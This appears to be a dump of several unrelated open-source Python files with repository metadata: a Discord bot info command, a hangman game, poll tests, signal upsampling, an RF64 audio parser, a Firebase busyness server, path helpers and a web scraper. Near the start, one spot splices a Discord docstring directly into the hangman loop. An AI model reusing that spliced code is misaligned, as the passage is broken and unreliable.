ctx.reply(embed=embed, dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Icon sent!\")\n return\n\n region = str(ctx.server.region) if not str(ctx.server.region) in ctx.bot.objects[\"regions\"] else ctx.bot.objects[\"regions\"][str(ctx.server.region)]\n ver = {\n \"none\": \"None\",\n \"low\": \"Level 1 (Must have a verified email)\",\n \"medium\": \"Level 2 (Registered for more than 5 minutes)\",\n \"high\": \"Level 3 (Member for more than 10 minutes)\",\n \"4\": \"Level 4 (Verified phone number)\"\n }\n\n mfa = {\n 0: \"Disabled\",\n 1: \"Enabled\"\n }\n\n text = len([c for c in ctx.server.channels if c.type == discord.ChannelType.text])\n voice = len([c for c in ctx.server.channels if c.type == discord.ChannelType.voice])\n total = text + voice\n\n online = 0\n idle = 0\n offline = 0\n dnd = 0\n for m in ctx.server.members:\n if m.status == discord.Status.online:\n online = online + 1\n elif m.status == discord.Status.idle:\n idle = idle + 1\n elif m.status == discord.Status.offline:\n offline = offline + 1\n elif m.status == discord.Status.dnd:\n dnd = dnd + 1\n\n Online = ctx.bot.objects[\"emoji_online\"]\n Idle = ctx.bot.objects[\"emoji_idle\"]\n Dnd = ctx.bot.objects[\"emoji_dnd\"]\n Offline = ctx.bot.objects[\"emoji_offline\"]\n\n server_owner = ctx.server.owner\n owner = \"{} (id: {})\".format(server_owner, server_owner.id)\n members = \"{} humans, {} bots | {} total\".format(str(len([m for m in ctx.server.members if not m.bot])),\n str(len([m for m in ctx.server.members if m.bot])),\n ctx.server.member_count)\n created = ctx.server.created_at.strftime(\"%I:%M %p, %d/%m/%Y\")\n created_ago = \"({} ago)\".format(ctx.strfdelta(datetime.utcnow() - ctx.server.created_at, minutes=False))\n channels = \"{} text, {} voice | {} total\".format(text, voice, total)\n status = \"{} - **{}**\\n{} - **{}**\\n{} - **{}**\\n{} - **{}**\".format(Online, online, Idle, idle, Dnd, dnd, Offline, offline)\n avatar_url = ctx.server.icon_url\n icon = \"[Icon Link]({})\".format(avatar_url)\n is_large = \"More than 250 members\" if ctx.server.large else \"Less than 250 members\"\n\n prop_list = 
[\"Owner\", \"Region\", \"Icon\", \"Large server?\", \"Verification\", \"2FA\", \"Roles\", \"Members\", \"Channels\", \"Created at\", \"\"]\n value_list = [owner,\n region,\n icon,\n is_large,\n ver[str(ctx.server.verification_level)],\n mfa[ctx.server.mfa_level],\n len(ctx.server.roles),\n members, channels, created, created_ago]\n desc = ctx.prop_tabulate(prop_list, value_list)\n\n embed = discord.Embed(color=server_owner.colour if server_owner.colour.value else discord.Colour.teal(), description=desc)\n embed.set_author(name=\"{} (id: {})\".format(ctx.server, ctx.server.id))\n embed.set_thumbnail(url=avatar_url)\n\n emb_fields = [(\"Member Status\", status, 0)]\n\n await ctx.emb_add_fields(embed, emb_fields)\n out_msg = await ctx.reply(embed=embed, dm=ctx.bot.objects[\"brief\"])\n if out_msg and ctx.bot.objects[\"brief\"]:\n await ctx.confirm_sent(reply=\"Serverinfo sent!\")\n\n\n@cmds.cmd(\"channelinfo\",\n category=\"Info\",\n short_help=\"Displays information about a channel.\",\n edit_handler=cmds.edit_handler_rerun,\n aliases=[\"ci\"])\n@cmds.require('in_server')\nasync def cmd_channelinfo(ctx):\n \"\"\"\n Usage:\n {prefix}channelinfo [ | | 0 and \"_\" in guess:\n print(\"You have \" + str(lives) + \" lives left...\")\n \n # 2. Take the guess from the user\n user_input = input(\"Guess a character (also whitespace): \").lower()\n \n # 3. Find all indices where the guessed character occurs in the solution\n indices = []\n for i in range(len(solution)):\n if solution[i]==user_input:\n indices += [i]\n \n # 4. Test whether the guessed character didn't occur -- reduce lives if so\n if len(indices)==0:\n lives = lives - 1\n \n # 5. Fill in the guess at all correct indices\n for index in indices:\n guess = guess[:index] + user_input + guess[index+1:]\n \n # 6. Output current (partial) solutions\n print(\"The secret phrase:\")\n output = \"\"\n for c in guess:\n output += c + \" \"\n print(output)\n print(\"\")\n\n# 7. Successfull termination? 
\nif lives==0:\n print(\"Game over!\")\nelse:\n print(\"You won!\")","repo_name":"karthick90/python-workout","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8509016991","text":"import unittest\n\nfrom zope.interface.verify import verifyObject\nfrom silva.core.interfaces import IPublicationWorkflow\nfrom Products.Silva.ftesting import public_settings\nfrom Products.SilvaPoll.interfaces import IPollQuestion, IPollQuestionVersion\nfrom Products.SilvaPoll.testing import FunctionalLayer\n\n\ndef poll_settings(browser):\n public_settings(browser)\n browser.inspect.add('title', css='.poll h1')\n browser.inspect.add('vote_question', css='.poll h2')\n browser.inspect.add('results_question', css='.poll h3')\n browser.inspect.add('forms', css='form.poll-form', type='form')\n\n\nclass QuestionTestCase(unittest.TestCase):\n layer = FunctionalLayer\n\n def setUp(self):\n self.root = self.layer.get_application()\n self.layer.login('editor')\n\n def test_question(self):\n \"\"\"Test content type.\n \"\"\"\n factory = self.root.manage_addProduct['SilvaPoll']\n factory.manage_addPollQuestion('poll', 'Poll Status')\n\n self.assertTrue('poll' in self.root.objectIds())\n poll = self.root.poll\n self.assertTrue(verifyObject(IPollQuestion, poll))\n\n version = poll.get_editable()\n self.assertTrue(verifyObject(IPollQuestionVersion, version))\n version.set_title('New Poll')\n version.set_question('Does it poll ?')\n version.set_answers(['Yeah baby', 'Well, not really'])\n\n self.assertEqual(version.get_title(), 'New Poll')\n self.assertEqual(version.get_question(), 'Does it poll ?')\n self.assertEqual(version.get_answers(),\n ['Yeah baby', 'Well, not really'])\n\n def test_view(self):\n \"\"\"Test public view.\n \"\"\"\n factory = self.root.manage_addProduct['SilvaPoll']\n factory.manage_addPollQuestion('poll', 'Poll Status')\n version = self.root.poll.get_editable()\n version.set_title('New Poll')\n version.set_question('Does it poll ?')\n version.set_answers(['Yeah baby', 'Well, not really'])\n IPublicationWorkflow(self.root.poll).publish()\n\n with self.layer.get_browser(poll_settings) as browser:\n self.assertEqual(browser.open('/root/poll'), 200)\n self.assertEqual(browser.inspect.title, ['New Poll'])\n self.assertEqual(browser.inspect.vote_question, ['Does it poll ?'])\n self.assertEqual(len(browser.inspect.forms), 1)\n form = browser.inspect.forms[0]\n self.assertIn('answer', form.controls)\n self.assertIn('submit', form.controls)\n self.assertEqual(\n form.controls['answer'].options,\n ['Yeah baby', 'Well, not really'])\n form.controls['answer'].value = 'Yeah baby'\n self.assertEqual(\n form.controls['submit'].click(),\n 200)\n self.assertEqual(browser.inspect.title, ['New Poll'])\n self.assertEqual(browser.inspect.results_question,\n ['Does it poll ?'])\n self.assertEqual(len(browser.inspect.forms), 0)\n\n\ndef test_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(QuestionTestCase))\n return suite\n","repo_name":"silvacms/Products.SilvaPoll","sub_path":"Products/SilvaPoll/tests/test_questions.py","file_name":"test_questions.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29656086090","text":"from typing import Optional\nimport numpy as np\nfrom .base import TRANSFORMATIONS, 
BaseTransformation\n\n\n@TRANSFORMATIONS.register_module('upsample')\nclass UpsampleTransformation(BaseTransformation):\n def __init__(\n self,\n axis: int,\n ratio: Optional[int] = 1,\n ):\n super().__init__()\n self.axis = axis\n self.ratio = ratio\n\n def transform(self, data):\n assert data.ndim > self.axis >= -data.ndim, \"upsampling index out of range\"\n x = np.arange(data.shape[self.axis])\n new_x = np.linspace(0, data.shape[self.axis] - 1, self.ratio * data.shape[self.axis])\n new_data = np.apply_along_axis(lambda y: np.interp(new_x, x, y), self.axis, data)\n return new_data\n\n def shape_transform(self, shape):\n shape[self.axis] *= self.ratio\n return shape\n\n def __repr__(self):\n return f'Upsample Transformation | Axis: {self.axis} | Ratio: {self.ratio}'\n","repo_name":"microsoft/PhysioPro","sub_path":"physiopro/dataset/transformation/upsample.py","file_name":"upsample.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"28765314261","text":"import struct\nfrom collections import namedtuple\nfrom . import riff_parser\n\nRF64Context = namedtuple('RF64Context','sample_count bigchunk_table')\n\n\ndef parse_rf64(stream, signature = b'RF64'):\n # print(\"starting parse_rf64\")\n start = stream.tell()\n assert( stream.read(4) == b'WAVE' )\n\n ds64_chunk = riff_parser.parse_chunk(stream)\n\n ds64_field_spec = \"= ds64_fields_size )\n\n # print(\"Read ds64 chunk: len()\",len(ds64_data))\n riff_size, data_size, sample_count, length_lookup_table = struct.unpack( ds64_field_spec , ds64_data[0:ds64_fields_size] )\n\n bigchunk_table = {}\n chunksize64format = \"<4sL\"\n chunksize64size = struct.calcsize(chunksize64format)\n # print(\"Found chunks64s:\", length_lookup_table)\n\n for n in range(length_lookup_table):\n bigname, bigsize = struct.unpack_from( chunksize64format , ds64_data, offset= ds64_fields_size )\n bigchunk_table[bigname] = bigsize\n\n bigchunk_table[b'data'] = data_size\n bigchunk_table[signature] = riff_size\n\n stream.seek(start, 0)\n # print(\"returning from parse_rf64, context: \", RF64Context(sample_count=sample_count, bigchunk_table=bigchunk_table))\n return RF64Context( sample_count=sample_count, bigchunk_table=bigchunk_table )\n\n","repo_name":"iluvcapra/wavinfo","sub_path":"wavinfo/rf64_parser.py","file_name":"rf64_parser.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"} +{"seq_id":"34168741318","text":"# Import type hints\nfrom typing import Dict, List\n\n# Import database library\nimport firebase_admin as firebase\nfrom firebase_admin import firestore\n\n# Import library to make our API calls\nimport populartimes\n\n# Time (who would have guessed?)\nfrom time import time\nfrom datetime import datetime\n\n# Imports for frontend-backenc communication\nimport asyncio\nimport websockets\nimport math\n\n# Get the API key from the apiKey file\napiKeyFile = open(\"apiKey.txt\", \"r\")\n\nif apiKeyFile.mode == \"r\":\n apiKey = apiKeyFile.read()\n\n# Use a service account. 
The link needs to be a link to your credentials.\ncred = firebase.credentials.Certificate(\"dbauth.json\")\nfirebase.initialize_app(cred)\n\ndb = firestore.client()\n\ndef dbPush(locationID: str, value: int, collection: str):\n # PUSH TO DB\n doc_ref = db.collection(collection).document(locationID)\n # Updates DB if document exists, creates if it does not\n if doc_ref.get().exists:\n doc_ref.update({\n str(math.floor(time())): {\"value\": value}\n })\n else:\n doc_ref.set({\n str(math.floor(time())): {\"value\": value}\n })\n\ndef dbRead(document: str, collection: str):\n # Set up variables to read db and determine weighting\n doc_ref = db.collection(collection).document(document)\n doc = doc_ref.get()\n contents: Dict[str, Dict[str, int]] = doc.to_dict()\n total: float = 0\n totalWeight: float = 0\n\n # Determine weight of each entry based on how old it is\n if contents is None:\n return None\n for entryTime, entry in contents.items():\n weight: float = 1 - (time() - float(entryTime)) / 9000\n # Based on weight, either delete the entry or use the weight to determine how busy location is\n if weight < 0:\n doc_ref.update({\n entryTime: firestore.DELETE_FIELD\n })\n else:\n totalWeight += weight\n total += float(weight) * float(entry[\"value\"])\n # Prevents divide by zero errors\n if totalWeight == 0:\n return None\n total /= totalWeight\n return total\n\n\ndef getNearby(types: List[str], lat: float, lon: float):\n # Request from API information on nearby locations\n nearbyPlaces = populartimes.get(apiKey, types, (lat-0.005,lon-0.005), (lat+0.005,lon+0.005))\n return nearbyPlaces\n\nasync def onmessage(websocket, path: str):\n async for message in websocket:\n data: List[str] = message.split(\";\")\n # If server recieves request for nearby data...\n if data[0] == \"getRatings\":\n results = getNearby([data[3]], float(data[1]), float(data[2]))\n strData: str = \"\"\n for result in results:\n cur_pop: str = \"\"\n if \"current_popularity\" in result:\n cur_pop = result[\"current_popularity\"]\n elif \"populartimes\" in result: # fall back on average populartimes\n weekday: int = datetime.today().weekday()\n hour: int = datetime.now().hour\n cur_pop = result[\"populartimes\"][weekday][\"data\"][hour]\n strData += \";\" + result[\"name\"] + \" at \" + result[\"address\"] + \":\" + \\\n str(dbRead(result[\"id\"], \"userRatings\")) + \":\" + \\\n str(cur_pop) + \":\" + \\\n result[\"id\"] + \":\" + \\\n str(result[\"coordinates\"][\"lat\"]) + \":\" + \\\n str(result[\"coordinates\"][\"lng\"])\n # ...send data on locations to user\n await websocket.send(\"storeRatings\" + strData)\n # If server recieves user rating for a location\n elif data[0] == \"userRate\":\n # Push rating to database\n dbPush(data[1], int(data[2]), \"userRatings\")\n\n# Start websocket server\nasyncio.get_event_loop().run_until_complete(\n websockets.serve(onmessage, \"0.0.0.0\", 7030))\nasyncio.get_event_loop().run_forever()\n","repo_name":"VedaRePowered/easy-sparse-store-finder","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"71853411961","text":"#***********************Case test : Force and Coeff. 
Num.*********************\n#******************************************************************************\n\n# Tested on Python 2.7.16\n\n# Import library\nimport numpy as np\n\nrho = 1000.0 # fluid density\nnu = 1.007e-6 # fluid viscosity\n\n# Definition of radii\nR1 = 1.0 # Radius of left static cylinder\nR2 = 1.0 # Radius of right moving cylinder\n\n# Definition of displacement\nKC = 1.0e-2 # Keulegan-Carpenter number KC= u/R2\nu = KC * R2 # magnitude of displacement with u < 1e-2\nSk = 900.0 # Stokes number\nf = nu*Sk/(2*np.pi) # frequency of displacement (s^-1)\nT = 1.0/f # period of displacement\nOmega = Sk * nu / (R2**2.) # angular frequency of displacement (rad/s)\n\nprint('Stokes number Sk =', Sk)\nprint('Frequency F[1/s] =', f)\nprint('Pulsation w[rad/s] =', Omega)\nprint('Period T[s] =', T)\n\n\n\nt = np.loadtxt('TwoOscillatingCylinders_pb_Force_pression.out', unpack=True, usecols=[0]) # time\n\nt_adim = Omega*t # dimensionless time\n\n# Numerical\n\nFpx_left = np.loadtxt('TwoOscillatingCylinders_pb_Force_pression.out', unpack=True, usecols=[3]) # pressure x-axis for left cylinder\nFvx_left = np.loadtxt('TwoOscillatingCylinders_pb_Contrainte_visqueuse.out', unpack=True, usecols=[3]) # viscous force x-axis for left cylinder\n\nFpx_right = np.loadtxt('TwoOscillatingCylinders_pb_Force_pression.out', unpack=True, usecols=[5]) # pressure x-axis for right cylinder\nFvx_right = np.loadtxt('TwoOscillatingCylinders_pb_Contrainte_visqueuse.out', unpack=True, usecols=[5]) # viscous force x-axis for right cylinder\n\nFx_left = Fvx_left + Fpx_left # total fluid force x-axis for left cylinder\nFx_right = Fvx_right + Fpx_right # total fluid force x-axis for right cylinder\n\n\nFx_left_adim = Fx_left / (rho*R1**2.*u*Omega**2.) # total dimensionless fluid force x-axis for left cylinder\nFx_right_adim = Fx_right / (rho*R1**2.*u*Omega**2.) # total dimensionless fluid force x-axis for right cylinder\n\nDataOut_left = np.column_stack((t_adim,Fx_left_adim))\nnp.savetxt('Numerical_force_left.txt', DataOut_left) #self\n\nDataOut_right = np.column_stack((t_adim,Fx_right_adim))\nnp.savetxt('Numerical_force_right.txt', DataOut_right) # cross\n\n# Determining m_self, m_cross, c_cross and c_self (numerically)\n# Fourier's inner product : <f,g> = (2/5T) * integral from 0 to 5T f(t)*g(t) dt\n# m_self_x = (2/5T) * integral from 0 to 5T sin(Omega*t) Fx_right(t) dt/rho*pi*R1^2*u*Omega^2\n\nm_self_x = 2./5./T*np.trapz(np.sin(Omega*t)*Fx_right,t)/(rho*np.pi*R1**2.*u*Omega**2.) \nc_self_x = -2./5./T*np.trapz(np.cos(Omega*t)*Fx_right,t)/(rho*np.pi*R1**2.*u*Omega**2.) \nm_cross_x = 2./5./T*np.trapz(np.sin(Omega*t)*Fx_left,t)/(rho*np.pi*R1**2.*u*Omega**2.) \nc_cross_x = -2./5./T*np.trapz(np.cos(Omega*t)*Fx_left,t)/(rho*np.pi*R1**2.*u*Omega**2.) 
\n\nDataOut1 = np.column_stack((m_self_x,c_self_x, m_cross_x, c_cross_x))\nnp.savetxt('Numerical_coefficients.txt', DataOut1)\n\n# Theory \n\n\nJCP_m_self = 1.10\nLS_m_self = 1.11\nCOL_m_self = 1.11\n\nJCP_c_self = 0.117\nLS_c_self = 0.105\nCOL_c_self = 0.106\n\nJCP_m_cross = -0.116\nLS_m_cross = -0.138\nCOL_m_cross = -0.138\n\nJCP_c_cross = -0.0135\nLS_c_cross = -0.0132\nCOL_c_cross = -0.0136\n\nDataOut2 = np.column_stack((COL_m_self,COL_c_self, COL_m_cross, COL_c_cross))\nnp.savetxt('COL_coefficients.txt', DataOut2)\nDataOut3 = np.column_stack((LS_m_self,LS_c_self, LS_m_cross, LS_c_cross))\nnp.savetxt('LS_coefficients.txt', DataOut3)\n\nFx_left_adim_LS = (LS_m_cross*np.sin(t_adim)-LS_c_cross*np.cos(t_adim))*np.pi\nFx_right_adim_LS = (LS_m_self*np.sin(t_adim)-LS_c_self*np.cos(t_adim))*np.pi\n\nDataOut_left_LS = np.column_stack((t_adim,Fx_left_adim_LS))\nnp.savetxt('LS_force_left.txt', DataOut_left_LS)\nDataOut_right_LS = np.column_stack((t_adim,Fx_right_adim_LS))\nnp.savetxt('LS_force_right.txt', DataOut_right_LS)\n\nFx_left_adim_COL = (COL_m_cross*np.sin(t_adim)-COL_c_cross*np.cos(t_adim))*np.pi\nFx_right_adim_COL = (COL_m_self*np.sin(t_adim)-COL_c_self*np.cos(t_adim))*np.pi\n\nDataOut_left_COL = np.column_stack((t_adim,Fx_left_adim_COL))\nnp.savetxt('COL_force_left.txt', DataOut_left_COL)\nDataOut_right_COL = np.column_stack((t_adim,Fx_right_adim_COL))\nnp.savetxt('COL_force_right.txt', DataOut_right_COL)\n","repo_name":"cea-trust-platform/TrioCFD-code","sub_path":"share/Validation/Rapports_automatiques/Fluid_Structure_Interaction/TwoOscillatingCylindersALE/src/ForceNum.py","file_name":"ForceNum.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"40"} +{"seq_id":"9788830218","text":"\"\"\"\n marvin\n ~~~~~~\n\n This is the main entry point to marvin, the API endpoints for streamr.\n\"\"\"\n\n# pylint: disable=invalid-name,superfluous-parens\nfrom . import utils\nfrom .security import before_request_authentication\n\nfrom celery import Celery\nfrom flask import Flask\nfrom flask.ext.principal import Principal\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom logging import getLogger\nfrom sqlalchemy_defaults import make_lazy_configured\nfrom os import path, environ\n\nimport logging.config\nimport sqlalchemy\nimport yaml\n\n\napi = utils.ApiBase()\ndb = SQLAlchemy()\nprincipal = Principal()\n\n_logger = getLogger('marvin')\n\n\ndef create_app(config_file=None, **extra_config):\n \"\"\" Creates a WSGI app.\n\n :param config_file: Load config from this file.\n :param extra_config: Extra configuration values to pass to the WSGI object.\n \"\"\"\n app = Flask(__name__)\n\n _configure_app(app, config_file, **extra_config)\n _configure_logging(app)\n _connect_extensions(app)\n\n # Configure lazy models\n make_lazy_configured(sqlalchemy.orm.mapper)\n\n _connect_blueprints(app)\n _connect_api_endpoints()\n _connect_utilities(app)\n\n # Import modules that connect to signals\n from . 
import permissions as _\n\n    return app\n\n\ndef _configure_app(app, config_file=None, **extra_config):\n    # Load the core settings\n    core_settings = path.abspath(path.join(path.dirname(__file__), 'settings.py'))\n    app.config.from_pyfile(core_settings)\n\n    # Load from specified config file\n    if config_file is not None:\n        app.config.from_pyfile(config_file)\n\n    # Load from environment specified config\n    if 'MARVIN_CONFIG_FILE' in environ:\n        print(\"Loading config from %s...\" % environ['MARVIN_CONFIG_FILE'])\n        app.config.from_envvar('MARVIN_CONFIG_FILE')\n\n    # Override with any kwargs given\n    app.config.update(extra_config)\n\n\ndef _configure_logging(app):\n    \"\"\" Configures log handlers for the app, if necessary. Log config can be ignored if TESTING=True or DEBUG=True. \"\"\"\n    log_conf_path = app.config.get('LOG_CONF_PATH')\n    if log_conf_path:\n        print(\"Loading log config from %s\" % log_conf_path)\n        _init_logging(log_conf_path)\n    else:\n        ignore_absent_logging = app.config.get('DEBUG') or app.config.get('TESTING')\n        if not ignore_absent_logging:\n            raise ValueError('ERROR: LOG_CONF_PATH not found in config, terminating.')\n\n\ndef _connect_extensions(app):\n    db.init_app(app)\n    api.init_app(app)\n    principal.init_app(app)\n\n\ndef _connect_blueprints(app):\n    # Import views (must be done down here to avoid circular imports)\n    from .views import stats\n    from .views import promo\n\n    app.register_blueprint(stats.mod)\n    app.register_blueprint(promo.mod)\n\n\ndef _connect_api_endpoints():\n    # Import views (must be done down here to avoid circular imports)\n    from .views import movies\n    from .views import streams\n    from .views import entries\n    from .views import users\n\n    api.add_resource(movies.AllMoviesView, '/movies')\n    api.add_resource(movies.MovieDetailView, '/movies/<movie_id>')\n    api.add_resource(streams.CreateStreamView, '/movies/<movie_id>/createStream')\n    api.add_resource(streams.StreamDetailView, '/streams/<stream_id>')\n    api.add_resource(streams.StreamEntryView, '/streams/<stream_id>/entries')\n    api.add_resource(streams.PublishStreamView, '/streams/<stream_id>/publish')\n    api.add_resource(streams.UnpublishStreamView, '/streams/<stream_id>/unpublish')\n    api.add_resource(entries.CreateEntryView, '/streams/<stream_id>/createEntry')\n    api.add_resource(entries.EntryDetailView, '/entries/<entry_id>')\n    api.add_resource(users.CreateUserView, '/users')\n    api.add_resource(users.UserDetailView, '/users/<user_id>')\n    api.add_resource(users.LoginView, '/login')\n\n\ndef _connect_utilities(app):\n    # Error handler\n    app.register_error_handler(500, utils.error_handler)\n\n    # Connect before and after request handlers\n    app.before_request(before_request_authentication)\n    app.teardown_appcontext(utils.teardown_appcontext)\n\n\ndef _init_logging(log_conf_path):\n    \"\"\" Configure logging with the config given. \"\"\"\n    with open(log_conf_path) as log_conf_file:\n        log_conf = yaml.load(log_conf_file)\n    logging.config.dictConfig(log_conf)\n\n\ndef make_celery():\n    \"\"\" Creates a celery object.\n\n    Requires that create_app() can be called without arguments, so MARVIN_CONFIG_FILE should\n    probably point to the config file you want to use.\n    \"\"\"\n    app = create_app()\n    celery = Celery(app.import_name, broker=app.config['CELERY_BROKER_URL'])\n    celery.conf.update(app.config)\n    TaskBase = celery.Task\n    class ContextTask(TaskBase):\n        \"\"\" Wraps the base task to make sure it's run in an app context. 
\"\"\"\n\n abstract = True\n\n def __call__(self, *args, **kwargs):\n with app.app_context():\n return TaskBase.__call__(self, *args, **kwargs)\n celery.Task = ContextTask\n return celery\n","repo_name":"streamr/marvin","sub_path":"marvin/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1838061720","text":"from .stringMethods import replaceAll, camelToSnake, snakeToCamel, toVariableName\r\nfrom typing import Literal\r\n\r\nSPLITCHAR = '/'\r\nSINGLE_LEVEL_WILDCARD = '+'\r\nMULTI_LEVEL_WILDCARD = '#'\r\n\r\n\r\ndef pathToSnakeCase(path: str, splitchar=SPLITCHAR) -> str:\r\n # Join the splitchar with the adapted strings.\r\n return splitchar.join(\r\n map(\r\n lambda item: camelToSnake(item),\r\n path.split(splitchar)\r\n )\r\n )\r\n\r\n\r\ndef pathToCamelCase(path: str, splitchar=SPLITCHAR) -> str:\r\n # Join the splitchar with the adapted strings.\r\n return splitchar.join(\r\n map(\r\n lambda item: snakeToCamel(item),\r\n path.split(splitchar)\r\n )\r\n )\r\n\r\n\r\ndef convertPath(path: str) -> str:\r\n \"\"\" converts the path\r\n\r\n Args:\r\n path (str): The Path to adapt.\r\n\r\n Returns:\r\n str: The adapted Path\r\n \"\"\"\r\n return replaceAll(path, ['.', '[', [']', '']], SPLITCHAR)\r\n\r\n\r\ndef _isNumber(item: str) -> bool:\r\n try:\r\n float(item)\r\n return True\r\n except BaseException:\r\n return False\r\n\r\n\r\ndef toPythonPath(path: str, style: Literal[\"dot\", \"bracket\"] = \"dot\") -> str:\r\n \"\"\" converts the nope-path to a python path.\r\n\r\n Args:\r\n path (str): The Path to adapt.\r\n style (Literal[\"dot\",\"bracket\"], optional): The access-style (bracket or dotted.). Defaults to \"dot\".\r\n\r\n Returns:\r\n str: The adapted Path\r\n \"\"\"\r\n\r\n ret = \"\"\r\n splitted = path.split(SPLITCHAR)\r\n\r\n for item in splitted:\r\n if len(ret) > 0:\r\n if _isNumber(ret):\r\n ret += f\"[{item}]\"\r\n elif style == \"dot\":\r\n ret += \".\" + item\r\n else:\r\n ret += f\"[{item}]\"\r\n else:\r\n ret = item\r\n return ret\r\n\r\n\r\ndef containsWildcards(str: str) -> bool:\r\n \"\"\" Determines, whether the given string contains a single level card or not.\r\n\r\n Args:\r\n str (str): String to check\r\n\r\n Returns:\r\n bool: Result\r\n \"\"\"\r\n return SINGLE_LEVEL_WILDCARD in str or MULTI_LEVEL_WILDCARD in str\r\n\r\n\r\ndef getLeastCommonPathSegment(\r\n pathes, considerSingleLevel=False, considerMultiLevel=False):\r\n \"\"\" Returns the least common segmet of all pathes, included in the pathes array.\r\n\r\n Args:\r\n pathes (str[]): The Segments to compare.\r\n considerSingleLevel (bool): allows \"singlelevel\"-wildcards in the segments\r\n considerMultiLevel (bool): allows \"multilevel\"-wildcards in the segments\r\n\r\n Returns:\r\n (False | str): the least common segment of the pathes or False.\r\n \"\"\"\r\n current_path = pathes.pop()\r\n while len(pathes) > 0:\r\n next = pathes.pop()\r\n current_path = _getLeastCommonPathSegment(\r\n current_path, next, considerSingleLevel=considerSingleLevel, considerMultiLevel=considerMultiLevel)\r\n\r\n # Only proceed, if there are elements included.\r\n if not current_path:\r\n # Return False\r\n return current_path\r\n\r\n # Return the least common segments.\r\n return current_path\r\n\r\n\r\ndef _getLeastCommonPathSegment(\r\n path01, path02, considerSingleLevel=False, considerMultiLevel=False):\r\n \"\"\"_summary_\r\n\r\n Args:\r\n path01 (_type_): _description_\r\n 
path02 (_type_): _description_\r\n        opts (_type_, optional): _description_. Defaults to dotted_dict({}).\r\n\r\n    Returns:\r\n        _type_: _description_\r\n    \"\"\"\r\n    p1 = convertPath(path01).split(SPLITCHAR)\r\n    p2 = convertPath(path02).split(SPLITCHAR)\r\n\r\n    ret = []\r\n    idx = 0\r\n\r\n    l1 = len(p1)\r\n    l2 = len(p2)\r\n\r\n    _max = min(l1, l2)\r\n\r\n    while idx < _max:\r\n\r\n        if p1[idx] == p2[idx]:\r\n            ret += [p1[idx]]\r\n        elif considerSingleLevel:\r\n            # a single-level wildcard matches exactly one segment, so keep\r\n            # the concrete segment from the other path and continue.\r\n            if p1[idx] == SINGLE_LEVEL_WILDCARD:\r\n                ret += [p2[idx]]\r\n            elif p2[idx] == SINGLE_LEVEL_WILDCARD:\r\n                ret += [p1[idx]]\r\n            else:\r\n                break\r\n        elif considerMultiLevel:\r\n            # a multi-level wildcard swallows the remainder: extend with the\r\n            # remaining concrete segments (not a nested list, so that\r\n            # SPLITCHAR.join(ret) below receives only strings).\r\n            if p1[idx] == MULTI_LEVEL_WILDCARD:\r\n                ret += p2[idx:]\r\n                break\r\n            elif p2[idx] == MULTI_LEVEL_WILDCARD:\r\n                ret += p1[idx:]\r\n                break\r\n            else:\r\n                break\r\n        else:\r\n            break\r\n        idx = idx + 1\r\n    if len(ret):\r\n        return SPLITCHAR.join(ret)\r\n    return False\r\n\r\n\r\ndef patternIsValid(str: str) -> bool:\r\n    \"\"\" Function to test if a pattern is valid\r\n\r\n    Args:\r\n        str (str): The pattern to test\r\n\r\n    Returns:\r\n        bool: The result.\r\n    \"\"\"\r\n\r\n    if str == \"\":\r\n        return True\r\n\r\n    splitted = str.split(SPLITCHAR)\r\n    last_index = len(splitted) - 1\r\n\r\n    for idx, segment in enumerate(splitted):\r\n        if segment:\r\n            if segment == MULTI_LEVEL_WILDCARD:\r\n                return idx == last_index\r\n        else:\r\n            return False\r\n\r\n    return True\r\n\r\n\r\ndef varifyPath(path: str) -> str:\r\n    \"\"\" Start to verify the Path.\r\n\r\n    Args:\r\n        path (str): The Path to adapt.\r\n\r\n    Returns:\r\n        str: The item to return\r\n    \"\"\"\r\n    return SPLITCHAR.join(\r\n        map(lambda item: toVariableName(item), path.split(SPLITCHAR)))\r\n","repo_name":"ZeMA-gGmbH/NoPE-PY","sub_path":"nope/helpers/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":5206,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"36660305551","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n# Assuming you have a pandas DataFrame named 'df' with a column 'url'\ndf = pd.read_csv('data/devpost_data_updateClicks.csv') # Load your dataset\n\ndef extract_description(url):\n    try:\n        response = requests.get(url)\n        if response.status_code == 200:\n            soup = BeautifulSoup(response.content, 'html.parser')\n            description_element = soup.find(id='challenge-description')\n            # guard before get_text(): calling it on None would raise an\n            # AttributeError that the RequestException handler cannot catch\n            if description_element is None:\n                return \"Description not found\"\n            content = description_element.get_text(strip=True)\n            print(content)\n            return content\n    except requests.RequestException:\n        return \"Failed to retrieve content\"\n\n# Apply the function to each URL in the DataFrame\ndf['description'] = df['url'].apply(extract_description)\n\n# Now df has a new column 'description' with the extracted content\ndf.to_csv('data/devpost_data_update3.csv', index=False)","repo_name":"Chenchuhui/COSI101A-FINAL-Project-RecommendationSystem","sub_path":"processData/extract_description.py","file_name":"extract_description.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
